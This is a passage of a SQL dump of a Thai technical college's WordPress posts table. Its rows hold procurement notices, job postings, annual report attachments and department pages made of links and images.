(1729, 3, '2018-03-12 09:33:47', '2018-03-12 02:33:47', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%94%E0%B9%89%E0%B8%A7%E0%B8%A2%E0%B8%A7%E0%B8%B4%E0%B8%98%E0%B8%B5%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C-e-bidding.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n ', 'ประกาศ ประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding) จำนวน 4 รายการ', '', 'inherit', 'closed', 'closed', '', '1727-revision-v1', '', '', '2018-03-12 09:33:47', '2018-03-12 02:33:47', '', 1727, 'http://www.technicrayong.ac.th/1727-revision-v1/', 0, 'revision', '', 0),
(1731, 3, '2018-03-12 09:48:05', '2018-03-12 02:48:05', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%99%E0%B8%87%E0%B8%B2%E0%B8%99-2-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n ', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ คนงาน จำนวน 2 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad-2', '', '', '2018-03-12 09:48:05', '2018-03-12 02:48:05', '', 0, 'http://www.technicrayong.ac.th/?p=1731', 454, 'post', '', 0),
(1732, 3, '2018-03-12 09:47:43', '2018-03-12 02:47:43', '', 'รับสมัครคนงาน 2 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%99%e0%b8%87%e0%b8%b2%e0%b8%99-2-%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2', '', '', '2018-03-12 09:47:43', '2018-03-12 02:47:43', '', 1731, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/รับสมัครคนงาน-2-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(1733, 3, '2018-03-12 09:48:05', '2018-03-12 02:48:05', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F03%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%99%E0%B8%87%E0%B8%B2%E0%B8%99-2-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n\r\n ', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ คนงาน จำนวน 2 อัตรา', '', 'inherit', 'closed', 'closed', '', '1731-revision-v1', '', '', '2018-03-12 09:48:05', '2018-03-12 02:48:05', '', 1731, 'http://www.technicrayong.ac.th/1731-revision-v1/', 0, 'revision', '', 0),
(1734, 3, '2018-03-12 10:08:17', '2018-03-12 03:08:17', '', 'รายงานผล การปฏิบัติงาน และการใช้จ่ายเงินงบประมาณ 2553', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99-%e0%b9%81', '', '', '2018-03-12 10:08:17', '2018-03-12 03:08:17', '', 1706, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2553.pdf', 0, 'attachment', 'application/pdf', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1735, 3, '2018-03-12 10:08:23', '2018-03-12 03:08:23', '', 'รายงานผล การปฏิบัติงาน และการใช้จ่ายเงินงบประมาณ 2554', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99-2', '', '', '2018-03-12 10:08:23', '2018-03-12 03:08:23', '', 1706, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2554.pdf', 0, 'attachment', 'application/pdf', 0),
(1736, 3, '2018-03-12 10:10:07', '2018-03-12 03:10:07', '', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ 2556', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95-2', '', '', '2018-03-12 10:10:07', '2018-03-12 03:10:07', '', 1706, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf', 0, 'attachment', 'application/pdf', 0),
(1738, 3, '2018-03-12 10:15:24', '2018-03-12 03:15:24', '', 'รายงานผลปี 2555', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%9b%e0%b8%b5-2555', '', '', '2018-03-12 10:15:24', '2018-03-12 03:15:24', '', 1706, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/รายงานผลปี-2555.pdf', 0, 'attachment', 'application/pdf', 0),
(1739, 3, '2018-03-12 10:28:54', '2018-03-12 03:28:54', '<h4></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2556<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลปี-2555.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2554.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\">--><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2553.pdf\">รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2553<--</a></span></h4>\r\n ', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ', '', 'inherit', 'closed', 'closed', '', '1706-revision-v1', '', '', '2018-03-12 10:28:54', '2018-03-12 03:28:54', '', 1706, 'http://www.technicrayong.ac.th/1706-revision-v1/', 0, 'revision', '', 0),
(1740, 3, '2018-03-12 10:39:40', '2018-03-12 03:39:40', '<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27-300x82.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #ff0000;\">--->ข้อมูลงบประมาณ ปีงบประมาณ 2561<---</span></a></h3>\r\n<h4><a href=\"/แผนปฏิบัติราชการ\"><span style=\"color: #ff6600;\">** แผนปฏิบัติราชการ</span></a></h4>\r\n<h4><a href=\"/แผนพัฒนาสถานศึกษา\"><span style=\"color: #ff6600;\">** แผนพัฒนาสถานศึกษา </span></a></h4>\r\n<h4><a href=\"/แผนโครงการกิจกรรมชมรมว\"><span style=\"color: #ff6600;\">** แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ </span></a></h4>\r\n<h4><a href=\"http://www.technicrayong.ac.th/รายงานผลการปฏิบัติงานต\"><span style=\"color: #ff00ff;\">** รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</span></a></h4>\r\n<h4><a href=\"/ปฏิทินปฏิบัติงาน\"><span style=\"color: #008000;\">** ปฏิทินปฏิบัติงาน</span></a></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc\">** แบบฟอร์ม สผ.งาน</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">** แบบฟอร์มโครงการ</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">** แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n ', 'งานวางแผนและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2018-03-12 10:39:40', '2018-03-12 03:39:40', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
(1741, 3, '2018-03-12 14:40:15', '2018-03-12 07:40:15', ' \r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์-พ.ศ.๒๕๕๐.pptx\">พระราชบัญญัติว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ.๒๕๕๐</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต-ปี-2558.pdf\">ระเบียบการใช้คอมพิวเตอร์และอินเตอร์เน็ต ปี ๒๕๕๘</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/2_หลักเกณฑ์การเก็บรักษาข้อมูลจราจรทางคอมพิวเตอร์.ppt\">หลักเกณฑ์การเก็บรักษาข้อมูลจราจรทางคอมพิวเตอร์</a></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/แบบฟอร์มขอใช้-INTERNET-สำหรับบุคลากรทางการศึกษา.docx\">แบบฟอร์มขอใช้ INTERNET (สำหรับบุคลากรทางการศึกษา)</a></h3>\r\n<h3><a href=\"/ขั้นตอนการเปลี่ยน-password\"><span style=\"color: #800000;\">ขั้นตอนการเปลี่ยน PASSWORD สำหรับใช้งานอินเตอร์เน็ต (ภายในวิทยาลัยฯ)</span></a></h3>\r\n<h3><a href=\"/ข้อมูลนักนักศึกษา-2562/\"><span style=\"color: #008000;\">ข้อมูลนักเรียน นักศึกษา</span></a></h3>\r\n<h3><span style=\"color: #008000;\">ข้อมูลบุคลากร</span></h3>\r\n ', 'งานศูนย์ข้อมูลสารสนเทศ', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b9%e0%b8%99%e0%b8%a2%e0%b9%8c%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5', '', '', '2019-11-28 10:06:18', '2019-11-28 03:06:18', '', 0, 'http://www.technicrayong.ac.th/?page_id=1741', 0, 'page', '', 0),
(1742, 3, '2018-03-12 14:37:27', '2018-03-12 07:37:27', '', '5-3-2561 13-45-54', '', 'inherit', 'closed', 'closed', '', '5-3-2561-13-45-54-2', '', '', '2018-03-12 14:37:27', '2018-03-12 07:37:27', '', 1741, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/5-3-2561-13-45-54-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(1743, 3, '2018-03-12 14:37:43', '2018-03-12 07:37:43', '', '7-3-2561 14-43-12', '', 'inherit', 'closed', 'closed', '', '7-3-2561-14-43-12-2', '', '', '2018-03-12 14:37:43', '2018-03-12 07:37:43', '', 1741, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/7-3-2561-14-43-12-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(1744, 3, '2018-03-12 14:40:15', '2018-03-12 07:40:15', '<img class=\"aligncenter size-full wp-image-1742\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54-1.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1743\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-1-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1655\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12-275x300.jpg\" alt=\"\" width=\"275\" height=\"300\" />\r\n\r\n ', 'งานศูนย์ข้อมูล', '', 'inherit', 'closed', 'closed', '', '1741-revision-v1', '', '', '2018-03-12 14:40:15', '2018-03-12 07:40:15', '', 1741, 'http://www.technicrayong.ac.th/1741-revision-v1/', 0, 'revision', '', 0),
(1745, 3, '2018-03-12 14:44:25', '2018-03-12 07:44:25', '<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3393\" src=\"/wp-content/uploads/2018/07/65424786453.jpg\" alt=\"\" width=\"228\" height=\"333\" />\r\n\r\n ', 'งานความร่วมมือ', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad', '', '', '2018-07-10 10:41:47', '2018-07-10 03:41:47', '', 0, 'http://www.technicrayong.ac.th/?page_id=1745', 0, 'page', '', 0),
(1746, 3, '2018-03-12 14:44:25', '2018-03-12 07:44:25', '<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1656 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-57.jpg\" alt=\"\" width=\"236\" height=\"321\" />', 'งานความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1745-revision-v1', '', '', '2018-03-12 14:44:25', '2018-03-12 07:44:25', '', 1745, 'http://www.technicrayong.ac.th/1745-revision-v1/', 0, 'revision', '', 0),
(1747, 3, '2018-03-12 14:45:06', '2018-03-12 07:45:06', '<img class=\"aligncenter size-full wp-image-1742\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54-1.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1743\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-1-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" />\r\n\r\n<img class=\"aligncenter wp-image-1655 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-12.jpg\" alt=\"\" width=\"306\" height=\"334\" />\r\n\r\n ', 'งานศูนย์ข้อมูล', '', 'inherit', 'closed', 'closed', '', '1741-revision-v1', '', '', '2018-03-12 14:45:06', '2018-03-12 07:45:06', '', 1741, 'http://www.technicrayong.ac.th/1741-revision-v1/', 0, 'revision', '', 0),
(1749, 3, '2018-03-12 14:45:54', '2018-03-12 07:45:54', '<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1656 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-57.jpg\" alt=\"\" width=\"236\" height=\"321\" />\r\n\r\n ', 'งานความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1745-revision-v1', '', '', '2018-03-12 14:45:54', '2018-03-12 07:45:54', '', 1745, 'http://www.technicrayong.ac.th/1745-revision-v1/', 0, 'revision', '', 0),
(1750, 3, '2018-03-12 14:46:18', '2018-03-12 07:46:18', '<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter wp-image-1656 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-25-57.jpg\" alt=\"\" width=\"236\" height=\"321\" />\r\n\r\n ', 'งานความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1745-revision-v1', '', '', '2018-03-12 14:46:18', '2018-03-12 07:46:18', '', 1745, 'http://www.technicrayong.ac.th/1745-revision-v1/', 0, 'revision', '', 0),
(1751, 3, '2018-03-12 14:48:58', '2018-03-12 07:48:58', '', '', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%a7%e0%b8%b4%e0%b8%88%e0%b8%b1%e0%b8%a2-%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2-%e0%b8%99%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1', '', '', '2019-06-13 17:46:44', '2019-06-13 10:46:44', '', 0, 'http://www.technicrayong.ac.th/?page_id=1751', 0, 'page', '', 0),
(1752, 3, '2018-03-12 14:48:58', '2018-03-12 07:48:58', '<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1657 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35.jpg\" alt=\"\" width=\"227\" height=\"305\" />\r\n\r\n ', 'งานวิจัย พัฒนา นวัตกรรม และสิ่งประดิษฐ์', '', 'inherit', 'closed', 'closed', '', '1751-revision-v1', '', '', '2018-03-12 14:48:58', '2018-03-12 07:48:58', '', 1751, 'http://www.technicrayong.ac.th/1751-revision-v1/', 0, 'revision', '', 0),
(1753, 3, '2018-03-12 14:51:42', '2018-03-12 07:51:42', '<img class=\"wp-image-10856 aligncenter\" src=\"/wp-content/uploads/2020/11/หัวหน้าประกัน.jpg\" alt=\"\" width=\"329\" height=\"548\" />\r\n\r\n<img class=\"wp-image-10855 aligncenter\" src=\"/wp-content/uploads/2020/11/Untitled-5.jpg\" alt=\"\" width=\"330\" height=\"495\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://drive.google.com/file/d/0B7ghyAKLnNIXSWRFUVVoQUZJSFk/view\">โลโก้วิทยาลัยฯ</a></span></strong></h4>\r\n<h4><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/คู่มือการประเมินสถานศึกษาอาชีวศึกษาพระราชทาน.pdf\">คู่มือการประเมินสถานศึกษาอาชีวศึกษา เพื่อรับรางวัลพระราชทาน</a></span></strong></h4>\r\n<h4><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/%E0%B8%84%E0%B8%A7%E0%B8%B2%E0%B8%A1%E0%B8%AA%E0%B8%B3%E0%B8%84%E0%B8%B1%E0%B8%8D%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%AA%E0%B8%96%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B9%82%E0%B8%94%E0%B8%A2%E0%B8%95%E0%B9%89%E0%B8%99%20%E0%B8%9C%E0%B8%AD_%E0%B8%AA%E0%B8%B4%E0%B8%A3%E0%B8%B4%E0%B8%A3%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B9%8C.ppt\">ความรู้ด้านการประกันคุณภาพ</a></span></strong></h4>\r\n<h4><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-admin/post.php?post=2871&action=edit\">แบบฟอร์มเครื่องมือที่ใช้เก็บรวบรวมข้อมูล</a></span></strong></h4>\r\n<h4><a href=\"/%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar/\"><span style=\"color: #0000ff;\"><strong>รายงานประเมินตนเอง</strong> (SAR)</span></a></h4>\r\n<h4><a href=\"/%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%a0/\"><strong><span style=\"color: #0000ff;\">รายงานการประกันคุณภาพภายนอก</span></strong></a></h4>\r\n<h4><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2/\">ข้อมูลนักเรียน นักศึกษา</a></span></strong></h4>\r\n<h4><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/มาตรฐานการศึกษาสถานศึก\">มาตรฐานการศึกษาสถานศึกษา</a></span></strong></h4>\r\n<h4><strong><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/%e0%b8%81%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b9%81%e0%b8%99%e0%b8%a7%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%84%e0%b8%b8/\">กรอบแนวทางการประเมินคุณภาพภายนอก รอบสี่ ด้านการจัดการอาชีวศึกษา</a></span></strong></h4>\r\n<h4><a href=\"/%e0%b8%84%e0%b8%b3%e0%b8%aa%e0%b8%b1%e0%b9%88%e0%b8%87-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3-2/\"><strong><span style=\"color: #0000ff;\">คำสั่ง วิทยาลัยเทคนิคระยอง</span></strong></a></h4>', 'งานประกันคุณภาพและมาตรฐานการศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b1%e0%b8%99%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3', '', '', '2021-08-25 13:16:09', '2021-08-25 06:16:09', '', 0, 'http://www.technicrayong.ac.th/?page_id=1753', 0, 'page', '', 0),
(1754, 3, '2018-03-12 14:51:42', '2018-03-12 07:51:42', '<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />', 'งานประกันคุณภาพและมาตรฐานการศึกษา', '', 'inherit', 'closed', 'closed', '', '1753-revision-v1', '', '', '2018-03-12 14:51:42', '2018-03-12 07:51:42', '', 1753, 'http://www.technicrayong.ac.th/1753-revision-v1/', 0, 'revision', '', 0),
(1755, 3, '2018-03-12 14:55:56', '2018-03-12 07:55:56', '', '12-3-2561 14-57-21', '', 'inherit', 'closed', 'closed', '', '12-3-2561-14-57-21', '', '', '2018-03-12 14:55:56', '2018-03-12 07:55:56', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg', 0, 'attachment', 'image/jpeg', 0),
